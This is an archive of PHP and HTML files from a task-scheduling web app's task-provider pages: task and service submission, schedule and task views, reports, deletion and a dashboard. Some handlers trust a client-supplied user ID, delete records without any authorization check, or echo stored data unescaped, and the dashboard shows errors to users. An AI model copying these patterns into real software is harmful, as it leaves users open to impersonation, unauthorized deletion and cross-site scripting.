<a href="#" class="media">--> <!-- <span class="d-flex">--> <!-- <img src="../../img/users/1.jpg" class="rounded-circle" alt="">--> <!-- </span>--> <!-- <span class="media-body">--> <!-- <span class="heading-font-family media-heading">Steve Smith</span>--> <!-- <span class="media-content">I slowly updated projects</span>--> <!-- </span>--> <!-- </a>--> <!-- <a href="#" class="media">--> <!-- <span class="d-flex">--> <!-- <i class="ik ik-calendar"></i>--> <!-- </span>--> <!-- <span class="media-body">--> <!-- <span class="heading-font-family media-heading">To Do</span>--> <!-- <span class="media-content">Meeting with Nathan on Friday 8 AM ...</span>--> <!-- </span>--> <!-- </a>--> <!-- </div>--> <!-- <div class="footer"><a href="javascript:void(0);">See all activity</a></div>--> <!-- </div>--> <!-- </div>--> <!-- <button type="button" class="nav-link ml-10 right-sidebar-toggle"><i class="ik ik-message-square"></i><span class="badge bg-success">3</span></button>--> <!-- <div class="dropdown">--> <!-- <a class="nav-link dropdown-toggle" href="#" id="menuDropdown" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"><i class="ik ik-plus"></i></a>--> <!-- <div class="dropdown-menu dropdown-menu-right menu-grid" aria-labelledby="menuDropdown">--> <!-- <a class="dropdown-item" href="#" data-toggle="tooltip" data-placement="top" title="Dashboard"><i class="ik ik-bar-chart-2"></i></a>--> <!-- <a class="dropdown-item" href="#" data-toggle="tooltip" data-placement="top" title="Message"><i class="ik ik-mail"></i></a>--> <!-- <a class="dropdown-item" href="#" data-toggle="tooltip" data-placement="top" title="Accounts"><i class="ik ik-users"></i></a>--> <!-- <a class="dropdown-item" href="#" data-toggle="tooltip" data-placement="top" title="Sales"><i class="ik ik-shopping-cart"></i></a>--> <!-- <a class="dropdown-item" href="#" data-toggle="tooltip" data-placement="top" title="Purchase"><i class="ik ik-briefcase"></i></a>--> <!-- <a class="dropdown-item" href="#" data-toggle="tooltip" data-placement="top" title="Pages"><i class="ik ik-clipboard"></i></a>--> <!-- <a class="dropdown-item" href="#" data-toggle="tooltip" data-placement="top" title="Chats"><i class="ik ik-message-square"></i></a>--> <!-- <a class="dropdown-item" href="#" data-toggle="tooltip" data-placement="top" title="Contacts"><i class="ik ik-map-pin"></i></a>--> <!-- <a class="dropdown-item" href="#" data-toggle="tooltip" data-placement="top" title="Blocks"><i class="ik ik-inbox"></i></a>--> <!-- <a class="dropdown-item" href="#" data-toggle="tooltip" data-placement="top" title="Events"><i class="ik ik-calendar"></i></a>--> <!-- <a class="dropdown-item" href="#" data-toggle="tooltip" data-placement="top" title="Notifications"><i class="ik ik-bell"></i></a>--> <!-- <a class="dropdown-item" href="#" data-toggle="tooltip" data-placement="top" title="More"><i class="ik ik-more-horizontal"></i></a>--> <!-- </div>--> <!-- </div>--> <!-- <button type="button" class="nav-link ml-10" id="apps_modal_btn" data-toggle="modal" data-target="#appsModal"><i class="ik ik-grid"></i></button>--> <!-- <div class="dropdown">--> <!-- <a class="dropdown-toggle" href="#" id="userDropdown" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"><img class="avatar" src="../../img/user.jpg" alt=""></a>--> <!-- <div class="dropdown-menu dropdown-menu-right" aria-labelledby="userDropdown">--> <!-- <a class="dropdown-item" href="#"><i class="ik ik-user dropdown-icon"></i> Profile</a>--> <!-- <a class="dropdown-item" href="#"><i class="ik ik-settings dropdown-icon"></i> Settings</a>--> <!-- <a class="dropdown-item" href="#"><span class="float-right"><span class="badge badge-primary">6</span></span><i class="ik ik-mail dropdown-icon"></i> Inbox</a>--> <!-- <a class="dropdown-item" href="#"><i class="ik ik-navigation dropdown-icon"></i> Message</a>--> <!-- <a class="dropdown-item" href="#"><i class="ik ik-power dropdown-icon"></i> Logout</a>--> <!-- </div>--> <!-- </div>--> </div> </div> </div> </header>taskprovider/submit_task.php000064400000001716151676701240012335 0ustar00<?php //$currentUser = $_SESSION['user_id']; require_once '../../Classes/Task.php'; require_once '../../Service/TaskService.php'; if ($_SERVER['REQUEST_METHOD'] === 'POST') { $schedule_id = $_POST['schedule-id']; $service_id = $_POST['service-id']; $frequency = $_POST['frequency']; $dates = $_POST['dates']; $currentUser = $_POST['current-user']; $added_by = $currentUser; $updated_by = $currentUser; $created_at = date('Y-m-d H:i:s'); $updated_at = date('Y-m-d H:i:s'); $taskService = new TaskService(); $task = new Task('', $schedule_id, $service_id, $frequency,$dates, $currentUser, $currentUser, $created_at,$updated_at, false, null, false, false, false, null, null, false); if ($taskService->addTask($task)) { echo "Task added successfully!"; } else { echo "Failed to add task."; } } else { echo "Invalid request method."; } ?> taskprovider/submit_service.php000064400000002567151676701240013040 0ustar00<?php require_once '../../Classes/Service.php'; require_once '../../Service/ServiceService.php'; function validate_decimal($value) { if (is_numeric($value)) { return (float) $value; } return NULL; // Default to NULL if not a valid number } if ($_SERVER['REQUEST_METHOD'] === 'POST') { $name = $_POST['name']; $region = $_POST['region']; $address_line1 = $_POST['address_line1']; $address_line2 = $_POST['address_line2']; $suburb = $_POST['suburb']; $city = $_POST['city']; $state = $_POST['state']; $postal_code = $_POST['postal_code']; $country = $_POST['country']; //decimal value of latitude and longitude $latitude = isset($_POST['latitude']) ? validate_decimal($_POST['latitude']) : NULL; $longitude = isset($_POST['longitude']) ? validate_decimal($_POST['longitude']) : NULL; $created_at = date('Y-m-d H:i:s'); $updated_at = date('Y-m-d H:i:s'); $serviceService = new ServiceService(); $service = new Service("", $name, $region, $address_line1, $address_line2, $suburb, $city, $state, $postal_code, "Australia", "", "", "", "", $created_at, $updated_at); if ($serviceService->addService($service)) { echo "Service added successfully!"; } else { echo "Failed to add service."; } } else { echo "Invalid request method."; } ?> taskprovider/reports.php000064400000013115151676701240011502 0ustar00<?php include('head.php'); ?> <?php require_once '../../Classes/Database.php'; require_once '../../Service/SubtaskService.php'; require_once '../../Service/UserService.php'; require_once '../../Classes/System.php'; // Initialize necessary services and classes $System = new System(); $subtaskService = new SubtaskService(); $userService = new UserService(); ?> <style> .card { height: 300px; /* Increase the height of the cards */ border-radius: 15px; /* Add rounded corners */ margin-bottom: 20px; /* Add space between the cards */ } .card-body { height: 200px; display: flex; flex-direction: column; justify-content: center; } </style> <div class="main-content"> <div class="container-fluid"> <div class="page-header row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>View Reports</h5> <span>Navigate to different reports</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"><a href="#"><i class="ik ik-home"></i></a></li> <li class="breadcrumb-item"><a href="#">Reports</a></li> <li class="breadcrumb-item active" aria-current="page">View Reports</li> </ol> </nav> </div> </div> <div class="row mt-20"> <!-- First card --> <div class="col-md-6"> <a href="report_tasksstatusbyschedule.php" class="card text-center h-100"> <div class="card-body"> <i class="ik ik-calendar" style="font-size: 2em;"></i> <h5 class="card-title">Schedule status</h5> <p class="card-text">View the status of schedules</p> </div> </a> </div> <!-- Second card --> <div class="col-md-6"> <a href="report_alltasks.php" class="card text-center h-100"> <div class="card-body"> <i class="ik ik-box" style="font-size: 2em;"></i> <h5 class="card-title text-center">All Tasks</h5> <p class="card-text">View all tasks</p> </div> </a> </div> </div> <div class="row mt-20"> <!-- Third card --> <div class="col-md-6"> <a href="report_viewsubtasksdaywise.php" class="card text-center h-100"> <div class="card-body"> <i class="ik ik-x-circle" style="font-size: 2em;"></i> <h5 class="card-title text-center">Subtasks Day Wise</h5> <p class="card-text">View subtasks day wise</p> </div> </a> </div> <div class="col-md-6"> <a href="report_subtaskswithnotes.php" class="card text-center h-100"> <div class="card-body"> <i class="ik ik-file-text" style="font-size: 2em;"></i> <h5 class="card-title text-center">Subtasks with Notes</h5> <p class="card-text">View subtasks with notes</p> </div> </a> </div> <!-- Fourth card --> <!-- <div class="col-md-6">--> <!-- <a href="reports_acceptedtasksbyusers.php" class="card text-center h-100">--> <!-- <div class="card-body">--> <!-- <i class="ik ik-trending-up" style="font-size: 2em;"></i>--> <!-- <h5 class="card-title">Accepted Tasks by Users</h5>--> <!-- <p class="card-text">View accepted tasks categorized by assigned users</p>--> <!-- </div>--> <!-- </a>--> <!-- </div>--> </div> <div class="row mt-20 h-100"> <!-- Fifth card --> <!-- <div class="col-md-6">--> <!-- <a href="report_TaskSummaryForUsers.php" class="card text-center h-100">--> <!-- <div class="card-body">--> <!-- <i class="ik ik-list" style="font-size: 2em;"></i>--> <!-- <h5 class="card-title text-center">Task Summary for Each Subcontractor</h5>--> <!-- <p class="card-text">View summary of tasks for each subcontractor</p>--> <!-- </div>--> <!-- </a>--> <!-- </div>--> <!-- Sixth card --> <!-- <div class="col-md-6">--> <!-- <a href="#" class="card text-center h-100">--> <!-- <div class="card-body">--> <!-- <i class="ik ik-trending-down" style="font-size: 2em;"></i>--> <!-- <h5 class="card-title">Report 6</h5>--> <!-- <p class="card-text">Description of report 6</p>--> <!-- </div>--> <!-- </a>--> <!-- </div>--> </div> </div> </div> <?php include('footer.php'); ?> taskprovider/viewschedules.php000064400000032415151676701240012662 0ustar00<?php include('head.php'); // Include database connection and ScheduleService class require_once '../../Service/ScheduleService.php'; require_once '../../Classes/System.php'; $System = new System(); // Create ScheduleService instance $scheduleService = new ScheduleService(); // Initialize filters array $filters = []; // Check for filter inputs and add to the filters array if ($_SERVER['REQUEST_METHOD'] == 'GET') { if (!empty($_GET['date_from'])) { $filters['date_from'] = $_GET['date_from']; } if (!empty($_GET['date_to'])) { $filters['date_to'] = $_GET['date_to']; } } // Fetch schedules from the database based on filters $schedules = $scheduleService->getAllSchedules($filters); ?> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>View Schedules</h5> <span>View all schedules</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href="../../index.html"><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Schedules</a> </li> <li class="breadcrumb-item active" aria-current="page">View Schedules</li> </ol> </nav> </div> </div> </div> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <div class="card-header-left"> <button type="button" class="btn btn-primary" data-toggle="modal" data-target="#exampleModalCenter"><i class="ik ik-plus"></i> Create Schedule</button> </div> <div class="card-header-right"> </div> </div> </div> </div> </div> <!-- Filter Form --> <div class="row mb-3"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <h3>Filter Schedules</h3> </div> <div class="card-body"> <form method="GET" action=""> <div class="form-row"> <div class="form-group col-md-2"> <label for="date_from">Date From</label> <input type="date" class="form-control" id="date_from" name="date_from" value="<?php echo htmlspecialchars($_GET['date_from'] ?? ''); ?>"> </div> <div class="form-group col-md-2"> <label for="date_to">Date To</label> <input type="date" class="form-control" id="date_to" name="date_to" value="<?php echo htmlspecialchars($_GET['date_to'] ?? ''); ?>"> </div> </div> <button type="submit" class="btn btn-primary">Apply Filters</button> <a href="viewschedules.php" class="btn btn-secondary">Clear Filters</a> </form> </div> </div> </div> </div> <!-- End of Filter Form --> <div class="modal fade" id="exampleModalCenter" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterLabel" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="exampleModalCenterLabel">Add a new schedule</h5> <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button> </div> <div class="modal-body"> <div class="row"> <form id="scheduleForm" class="forms-sample"> <div class="col-md-12"> <div class="form-group row"> <div class="col-sm-3"> <label for="schedule-name" class="col-sm-3 col-form-label">Schedule Name:</label> </div> <div class="col-sm-9"> <input type="text" id="schedule-name" name="schedule-name" class="form-control" required placeholder="Enter schedule name"> </div> <input type="hidden" name="created_by" value="<?php echo $companyId; ?>"> </div> </div> </form> </div> <div class="row"> <div class="col-md-12"> </div> </div> <div id="message" class="mt-3"></div> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button> <button type="submit" form="scheduleForm" class="btn btn-primary">Add Schedule</button> </div> </div> </div> </div> <script> document.getElementById('scheduleForm').addEventListener('submit', function (event) { event.preventDefault(); const formData = new FormData(this); fetch('submit_schedule.php', { method: 'POST', body: formData }) .then(response => response.text()) .then(data => { const messageDiv = document.getElementById('message'); messageDiv.textContent = data; messageDiv.classList.add('alert', 'alert-success'); Swal.fire({ title: 'Success!', text: data, icon: 'success', confirmButtonText: 'Ok' }).then(() => { location.reload(); }); // Reset form document.getElementById('scheduleForm').reset(); }) .catch(error => { const messageDiv = document.getElementById('message'); messageDiv.textContent = 'Error: ' + error; messageDiv.classList.add('alert', 'alert-danger'); Swal.fire({ title: 'Error!', text: error, icon: 'error', confirmButtonText: 'Ok' }); }); }); </script> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-body"> <table id="advanced_table" class="table"> <thead> <tr> <th>ID</th> <th>Schedule Name</th> <th>Created By</th> <th>Created At</th> <th>Actions</th> </tr> </thead> <tbody> <?php foreach ($schedules as $schedule): ?> <tr> <td><?php echo 'SCH-000' . $schedule->id; ?></td> <td><?php echo $schedule->schedule_name; ?></td> <td><?php echo $schedule->created_by; ?></td> <td><?php echo date('F j, Y, g:i a', strtotime($schedule->created_at)); ?></td> <td> <a href="viewscheduletasks.php?id=<?php echo $System->encryptData($schedule->id) ?>" class="btn btn-primary">View Tasks</a> <!-- --><?php //if (!$scheduleService->hasAssignedTasks($schedule->id)): ?> <!-- <button class="btn btn-danger delete-schedule" data-schedule-id="--><?php //echo $System->encryptData($schedule->id); ?><!--">Delete</button>--> <!-- --><?php //endif; ?> <?php if (!$scheduleService->hasSubmittedSubTasks($schedule->id)): ?> <button type="button" class="btn btn-icon btn-danger delete-schedule" data-schedule-id="<?php echo $System->encryptData($schedule->id); ?>"><i class="ik ik-trash-2"></i></button> <?php endif; ?> </td> </tr> <?php endforeach; ?> </tbody> </table> </div> </div> </div> </div> </div> </div> <script> document.addEventListener('DOMContentLoaded', function() { // Find all delete buttons and attach click event var deleteButtons = document.querySelectorAll('.delete-schedule'); deleteButtons.forEach(function(button) { button.addEventListener('click', function() { var scheduleId = button.getAttribute('data-schedule-id'); // Show confirmation dialog using SweetAlert Swal.fire({ title: 'Are you sure?', text: "You won't be able to revert this!", icon: 'warning', showCancelButton: true, confirmButtonColor: '#3085d6', cancelButtonColor: '#d33', confirmButtonText: 'Yes, delete it!' }).then((result) => { if (result.isConfirmed) { // If confirmed, make AJAX request to delete_schedule.php var xhr = new XMLHttpRequest(); xhr.open('POST', 'delete_schedule.php', true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.onreadystatechange = function() { if (xhr.readyState == 4 && xhr.status == 200) { console.log(xhr.responseText); // Log the response for debugging if (xhr.responseText === 'success') { Swal.fire({ title: 'Deleted!', text: 'The schedule has been deleted.', icon: 'success' }).then(() => { window.location.reload(); // Reload the page after deletion }); } else { Swal.fire({ title: 'Error!', text: 'An error occurred while deleting the schedule. Please try again.', icon: 'error' }); } } }; xhr.send('scheduleId=' + scheduleId); // Send schedule ID to delete_schedule.php } }); }); }); }); </script> <?php include('footer.php'); ?> taskprovider/delete_subtask.php000064400000001021151676701240012773 0ustar00<?php // Include necessary files and instantiate objects require_once '../../Classes/Database.php'; require_once '../../Service/SubtaskService.php'; $subTaskService = new SubtaskService(); // Check if subtask ID is provided via POST if (isset($_POST['subtaskId'])) { $subtaskId = $_POST['subtaskId']; // Perform deletion of subtask if ($subTaskService->deleteSubtaskById($subtaskId)) { echo 'success'; } else { echo 'error'; } } else { echo 'invalid_request'; } ?> taskprovider/viewscheduletasks.php000064400000075023151676701240013547 0ustar00<?php include('head.php'); ?> <?php // Get schedule ID from URL parameter $schedule_id = $_GET['id']; // Include database connection and TaskService class require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Classes/System.php'; require_once '../../Service/ServiceService.php'; // Create ServiceService instance $serviceService = new ServiceService(); $services = $serviceService->getAllServicesForDropdown(); // Create TaskService instance $taskService = new TaskService(); $System = new System(); $schedule_id = $System->decryptData($_GET['id']); // show error if the provided id is not valid with Swal alert if (!$schedule_id) { echo "<script> Swal.fire({ title: 'Invalid Schedule ID', text: 'The URL parameter is invalid. Please go back and try again.', icon: 'error', confirmButtonText: 'OK' }).then(() => { window.location.href = 'viewschedules.php'; }); </script>"; exit; } // Fetch tasks from the database that belong to the given schedule $tasks = $taskService->getTasksByScheduleId($schedule_id); ?> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>View Tasks</h5> <span>View tasks for the selected schedule</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href="../../index.html"><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Schedules</a> </li> <li class="breadcrumb-item active" aria-current="page">View Tasks</li> </ol> </nav> </div> </div> </div> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <div class="card-header-left"> <a href="javascript:history.back()" class="btn btn-outline-primary">Back</a> </div> <div class="card-header-right"> <!-- <a href="createtasks.php?schedule_id=--> <?php //echo $schedule_id; ?><!--" class="btn btn-outline-primary">Add Task</a>--> <button type="button" class="btn btn-primary" data-toggle="modal" data-target="#createTaskModal"><i class="ik ik-plus"></i>Create Task </button> </div> </div> </div> </div> </div> <div class="modal fade" id="createTaskModal" role="dialog" aria-labelledby="exampleModalCenterLabel" aria-hidden="true"> <div class="modal-dialog modal-xl mt-0 mb-0" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="exampleModalCenterLabel">Add a Task</h5> <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button> </div> <div class="modal-body"> <form id="tasksForm"> <div class="row"> <div class="col-md-6"> <div class="form-group row"> <div class="col-sm-9"> <input type="text" id="schedule-id" name="schedule-id" class="form-control" value="<?php echo $schedule_id; ?>" <?php echo isset($schedule_id) ? 'readonly' : ''; ?> hidden> </div> </div> <div class="form-group row"> <label for="service-id" class="col-sm-3 col-form-label">Service:</label> <div class="col-sm-9"> <select id="service-id" name="service-id" class="form-control select2"></select> </div> </div> <input type="hidden" name="current-user" value="<?php echo $_SESSION['user_id']; ?>"> <script> document.addEventListener('DOMContentLoaded', function () { var services = <?php echo json_encode($services); ?>; var serviceSelect = document.getElementById("service-id"); services.forEach(service => { var option = document.createElement("option"); option.value = service.id; // Use service ID as value option.textContent = service.name; // Show service name serviceSelect.appendChild(option); }); }); </script> <div class="form-group row"> <label for="frequency" class="col-sm-3 col-form-label">Frequency:</label> <div class="col-sm-9"> <select id="frequency" name="frequency" class="form-control select2 frequencySelect"> <option value="daily">Daily</option> <option value="3x/week">3x/week</option> </select> </div> </div> </div> <input type="text" id="dates" name="dates" hidden> <div class="col-md-6"> <div class="d-flex flex-column"> <h1>Select Dates</h1> <div class="date-picker"></div> <div class="date-time-container"></div> </div> </div> </div> </form> <div id="message" class="mt-3"></div> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button> <button type="submit" form="tasksForm" class="btn btn-primary">Add Task</button> </div> </div> </div> </div> <script src="../../node_modules/flatpickr/dist/flatpickr.js"></script> <script> document.addEventListener('DOMContentLoaded', function () { initializeFlatpickr(); }); function initializeFlatpickr() { $('.date-picker').each(function () { flatpickr(this, { dateFormat: "Y-m-d", mode: "multiple", inline: true, onChange: function (selectedDates, dateStr, instance) { const container = $(instance.element).closest('.d-flex').find('.date-time-container'); const existingDateTimePairs = []; container.find('.form-group').each(function () { const date = $(this).find('input[type="text"]').first().val(); const time = $(this).find('.time-picker').val(); existingDateTimePairs.push({ date, time }); }); selectedDates.sort((a, b) => new Date(a) - new Date(b)); container.empty(); selectedDates.forEach((date) => { const formattedDate = formatDate(date); let timeValue = ''; existingDateTimePairs.forEach(pair => { if (pair.date === formattedDate) { timeValue = pair.time; } }); container.append(` <div class="form-group mb-2 mr-sm-2 mb-sm-0"> <input type="text" class="form-control" value="${formattedDate}" readonly> <input type="text" class="form-control time-picker" placeholder="Select Time" value="${timeValue}"> </div> `); }); initializeTimePicker(container); } }); }); } function initializeTimePicker(container) { container.find('.time-picker').each(function () { flatpickr(this, { enableTime: true, noCalendar: true, dateFormat: "H:i", }); }); } function formatDate(date) { const year = date.getFullYear(); const month = (date.getMonth() + 1).toString().padStart(2, '0'); const day = date.getDate().toString().padStart(2, '0'); return `${year}-${month}-${day}`; } document.getElementById('tasksForm').addEventListener('submit', function (event) { event.preventDefault(); // Collect date-time pairs const dateTimePairs = []; document.querySelectorAll('.date-time-container .form-group').forEach(group => { const date = group.querySelector('input[type="text"]').value; const time = group.querySelector('.time-picker').value; dateTimePairs.push({ date, time }); }); // Set the dates field value document.getElementById('dates').value = JSON.stringify(dateTimePairs); // Validate dates if (dateTimePairs.length === 0) { Swal.fire({ title: 'Error', text: 'Please select dates', icon: 'error', confirmButtonText: 'OK' }); return; } // Collect form data const formData = new FormData(this); // Send form data via fetch fetch('submit_task.php', { method: 'POST', body: formData }) .then(response => response.text()) .then(data => { // Reset form fields document.getElementById('service-id').value = ''; document.getElementById('frequency').value = ''; document.querySelector('.date-time-container').innerHTML = ''; // Show success message Swal.fire({ title: 'Task Created', text: data, icon: 'success', confirmButtonText: 'OK' }).then(() => { location.reload(); }); }) .catch(error => { // Show error message Swal.fire({ title: 'Error', text: error, icon: 'error', confirmButtonText: 'OK' }); }); }); function populateRegion() { var selectedService = document.getElementById('service-name').value; var selectedServiceData = <?php echo json_encode($services); ?>; var regionSelect = document.getElementById('region'); regionSelect.innerHTML = ''; selectedServiceData.forEach(service => { if (service.name === selectedService) { var regionOption = document.createElement('option'); regionOption.value = service.region; regionOption.textContent = service.region; regionSelect.appendChild(regionOption); } }); } populateRegion(); </script> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <div class="card-header-left"> <h3>View Tasks</h3> </div> <div class="card-header-right"> <!-- <button id="download_excel" class="btn btn-success">Export to Excel</button>--> </div> </div> <div class="card-body"> <div class="row"> <div class="col-md-12"> <div class="form-group row"> <div class="col-sm-3"> <label for="filter_service" class="col-form-label">Filter Service Name:</label> </div> <div class="col-sm-9"> <input type="text" class="form-control" id="filter_service"> </div> </div> <div class="form-group row"> <div class="col-sm-2"> <div class="row"> <div class="col-sm-3"> <label for="filter_region" class="col-form-label">Filter Region:</label> </div> <div class="col-sm-9"> <select class="form-control" id="filter_region"> <option value="">All Regions</option> <?php // Collect unique regions $uniqueRegions = []; foreach ($services as $service) { if (!in_array($service->region, $uniqueRegions)) { $uniqueRegions[] = $service->region; ?> <option value="<?= htmlspecialchars($service->region) ?>"><?= htmlspecialchars($service->region) ?></option> <?php } } ?> </select> </div> </div> </div> <div class="col-sm-3"> <div class="row"> <div class="col-sm-2"> <label for="filter_finished" class="col-form-label">Filter Finished:</label> </div> <div class="col-sm-9"> <select class="form-control" id="filter_finished"> <option value="">All</option> <option value="Not Finished">Not Finished.</option> <option value="Finished.">Finished.</option> </select> </div> </div> </div> <div class="col-sm-3"> <div class="row"> <div class="col-sm-2"> <label for="filter_assigned" class="col-form-label">Filter Assigned:</label> </div> <div class="col-sm-9"> <select class="form-control" id="filter_assigned"> <option value="">All</option> <option value="Not Assigned">Not Assigned.</option> <option value="Assigned.">Assigned.</option> </select> </div> </div> </div> <div class="col-sm-2"> <div class="row"> <div class="col-sm-2"> <label for="filter_public" class="col-form-label">Filter Public:</label> </div> <div class="col-sm-8"> <select class="form-control" id="filter_public"> <option value="">All</option> <option value="Not Public">Not Public</option> <option value="Public.">Public.</option> </select> </div> </div> </div> <div class="col-sm-2"> <button type="button" id="reset_filters" class="btn btn-icon btn-outline-danger"><i class="ik ik-refresh-cw"></i></button> </div> </div> <!-- Add other filters as per your requirements --> </div> </div> <table id="superadvanced_table" class="table"> <thead> <tr> <th>ID</th> <th>Service Name</th> <th>Region</th> <th>Frequency</th> <th>Created By</th> <th>Created At</th> <th>Finished</th> <th>Assigned</th> <th>Public Status</th> <th>Actions</th> </tr> </thead> <tbody> <?php foreach ($tasks as $task): ?> <tr> <td><?php echo 'TSK-000' . $task->id; ?></td> <td><?php echo $task->service_name; ?></td> <td><?php echo $task->region; ?></td> <td><?php echo $task->frequency; ?></td> <td><?php echo $task->created_by_name; ?></td> <td><?php echo date('F j, Y, g:i a', strtotime($task->created_at)); ?></td> <td><?php echo($task->finished ? '<label class="badge badge-success">Finished.</label>' : '<label class="badge badge-warning">Not Finished</label>'); ?></td> <td><?php echo($task->is_assigned ? '<label class="badge badge-success">Assigned.</label>' : '<label class="badge badge-warning">Not Assigned</label>'); ?></td> <td><?php echo($task->isPublic ? '<label class="badge badge-warning">Public.</label>' : '<label class="badge badge-success">Not Public</label>'); ?></td> <td> <a href="viewtask.php?id=<?php echo $System->encryptData($task->id); ?>" class="btn btn-primary">View Details</a> <?php if ($task->is_assigned == 0): ?> <button class="btn btn-danger delete-task" data-task-id="<?php echo $System->encryptData($task->id); ?>">Remove </button> <?php endif; ?> </td> </tr> <?php endforeach; ?> </tbody> </table> </div> <script> $(document).ready(function () { // Initialize DataTable var table = $('#superadvanced_table').DataTable({ // Configure initial settings if needed }); // Function to save filters to localStorage function saveFilters() { var filters = { service: $('#filter_service').val(), region: $('#filter_region').val(), finished: $('#filter_finished').val(), assigned: $('#filter_assigned').val(), public: $('#filter_public').val() }; localStorage.setItem('superadvancedTableFilters', JSON.stringify(filters)); } // Function to apply saved filters function applyFilters() { var filters = JSON.parse(localStorage.getItem('superadvancedTableFilters')); if (filters) { $('#filter_service').val(filters.service).trigger('keyup'); $('#filter_region').val(filters.region).trigger('change'); $('#filter_finished').val(filters.finished).trigger('change'); $('#filter_assigned').val(filters.assigned).trigger('change'); $('#filter_public').val(filters.public).trigger('change'); } } // Function to reset filters function resetFilters() { $('#filter_service').val('').trigger('keyup'); $('#filter_region').val('').trigger('change'); $('#filter_finished').val('').trigger('change'); $('#filter_assigned').val('').trigger('change'); $('#filter_public').val('').trigger('change'); localStorage.removeItem('superadvancedTableFilters'); table.search('').columns().search('').draw(); } // Check previous page and apply filters if necessary function checkPreviousPage() { var previousUrl = sessionStorage.getItem('previousUrl'); if (!previousUrl || !previousUrl.includes('viewtask.php')) { resetFilters(); } else { applyFilters(); } } checkPreviousPage(); // Add custom filters $('#filter_service').on('keyup', function () { table.column(1).search($(this).val()).draw(); saveFilters(); }); $('#filter_finished').on('change', function () { table.column(6).search($(this).val()).draw(); saveFilters(); }); $('#filter_region').on('change', function () { table.column(2).search($(this).val()).draw(); saveFilters(); }); $('#filter_assigned').on('change', function () { table.column(7).search($(this).val()).draw(); saveFilters(); }); $('#filter_public').on('change', function () { table.column(8).search($(this).val()).draw(); saveFilters(); }); // Add reset filters button functionality $('#reset_filters').on('click', function () { resetFilters(); }); // Apply saved filters on initial load applyFilters(); }); </script> </div> </div> </div> </div> </div> <script> document.addEventListener('DOMContentLoaded', function () { var deleteButtons = document.querySelectorAll('.delete-task'); deleteButtons.forEach(function (button) { button.addEventListener('click', function () { var taskId = button.getAttribute('data-task-id'); Swal.fire({ title: 'Are you sure?', text: "You won't be able to revert this!", icon: 'warning', showCancelButton: true, confirmButtonColor: '#3085d6', cancelButtonColor: '#d33', confirmButtonText: 'Yes, delete it!' }).then((result) => { if (result.isConfirmed) { var xhr = new XMLHttpRequest(); xhr.open('POST', 'delete_task.php', true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.onreadystatechange = function () { if (xhr.readyState == 4 && xhr.status == 200) { if (xhr.responseText === 'success') { Swal.fire({ title: 'Deleted!', text: 'Your task has been deleted.', icon: 'success' }).then(() => { window.location.reload(); }); } else { Swal.fire({ title: 'Error!', text: xhr.responseText, icon: 'error' }); } } }; xhr.send('taskId=' + taskId); } }); }); }); }); </script> <?php include('footer.php'); ?> taskprovider/dashboard.php000064400000036535151676701240011746 0ustar00<?php //enable error reporting error_reporting(E_ALL); ini_set('display_errors', 1); include('head.php'); require_once '../../Service/ReportsAndDashboardService.php'; $reportsAndDashboardService = new ReportsAndDashboardService(); // // //$pendingTasks = $reportsAndDashboardService->getPendingTasks($companyId); //$completedTasks =$reportsAndDashboardService->getCompletedTasks($companyId); // //$ongoingSubtasks = $reportsAndDashboardService->getOngoingSubtasks($companyId); //$unassignedSubtasks = $reportsAndDashboardService->getUnassignedSubtasks($companyId); // $subtasks = $reportsAndDashboardService->getSubtasks(); $taskProviderId = $_SESSION['user_id']; //Tasks added by me $tasksAddedByMe = $reportsAndDashboardService->getTasksAddedByMe($taskProviderId); //Service Locations $services = $reportsAndDashboardService->getServicesCount(); // Fetch completed and incomplete subtask summary data $subtasksSummary = $reportsAndDashboardService->getSubtasksSummaryAdmin(); $completedSubTasks = $subtasksSummary['completed']; $incompleteSubTasks = $subtasksSummary['incomplete']; $ongoingSubTasks = $completedSubTasks + $incompleteSubTasks; // Calculating ongoing subtasks // Fetch total finished and not finished task summary data $taskSummary = $reportsAndDashboardService->getTasksSummaryAdmin(); $completedTasks = $taskSummary['completed']; $pendingTasks = $taskSummary['pending']; $ongoingTasks = $taskSummary['total']; $todaySubtasksSummary = $reportsAndDashboardService->getSubtasksSummaryForTodayAdmin(date('Y-m-d')); $todayTotalSubTasks = $todaySubtasksSummary['total']; $todayCompletedSubTasks = $todaySubtasksSummary['completed']; 